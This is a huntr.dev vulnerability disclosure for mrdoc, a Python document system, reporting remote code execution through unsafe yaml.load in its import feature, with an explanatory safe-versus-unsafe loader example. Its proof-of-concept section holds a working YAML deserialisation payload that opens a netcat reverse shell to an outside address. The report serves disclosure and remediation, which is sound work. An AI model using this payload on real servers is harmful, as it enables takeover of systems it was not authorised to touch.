huntr report 04FC04B3-2DC1-4CAD-A090-E403CD66B5AD by b1nslashsh
Aug 29, 2021 - 9:12 a.m.

in zmister2016/mrdoc

www.huntr.dev
Tags: python, document management, rce vulnerability

EPSS: 0.001
Percentile: 35.0%

✍️ Description

mrdoc is an online document system developed in Python. It is suitable for individuals and small teams to manage documents, wikis, knowledge bases and notes, similar to GitBook. The package is vulnerable to remote code execution (RCE) because its import function deserializes user-supplied content with yaml.load, which honours Python-specific YAML tags and so instantiates arbitrary Python objects.
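The unsafe import pattern the report points at, beside a hardened version, as an added example that is not mrdoc's code. The constructed document uses the same `!!python/object/new:` tag family as the PoC but targets `str` with a harmless marker, so it demonstrates object instantiation without executing anything; `yaml.safe_load` rejects the very same document.

```python
"""Added example (not mrdoc's code): yaml.load on imported content is an
RCE sink because !!python/* tags instantiate arbitrary objects; a safe
loader refuses such tags and only builds plain YAML data types."""
import yaml

# Constructed document: same tag shape as the report's PoC, but the class
# is str and the argument is a marker string, so nothing is executed.
TAGGED_DOC = """!!python/object/new:str
args: ["constructed marker, not an exploit"]
"""

# Constructed benign import, the kind of content an importer should accept.
PLAIN_DOC = """title: Imported page
sections:
  - name: Intro
"""


def unsafe_import(data: str):
    """Vulnerable pattern: yaml.Loader is the unrestricted constructor, so
    a !!python/object/new:<class> tag resolves the class and calls it with
    the attacker-chosen args (type/exec in the PoC, str here)."""
    return yaml.load(data, Loader=yaml.Loader)


def safe_import(data: str):
    """Hardened pattern: SafeLoader has no constructor for !!python/* tags
    and raises yaml.constructor.ConstructorError instead of building them."""
    return yaml.safe_load(data)


def import_rejects_document(data: str) -> bool:
    """True when the hardened importer refuses the document outright,
    which is the desired outcome for any tagged (Python-object) YAML."""
    try:
        safe_import(data)
    except yaml.YAMLError:
        return True
    return False


if __name__ == "__main__":
    # Unsafe loader builds a Python object from the tag; safe loader refuses.
    print(repr(unsafe_import(TAGGED_DOC)))
    print("rejected by safe_load:", import_rejects_document(TAGGED_DOC))
    print(safe_import(PLAIN_DOC))
```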

🕵️‍♂️ Proof of Concept

Uploaded ZIP:

Payload.yaml:

!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.102 8090 >/tmp/f')"

💥 Impact

This vulnerability allows remote code execution (RCE) on the server hosting the application.
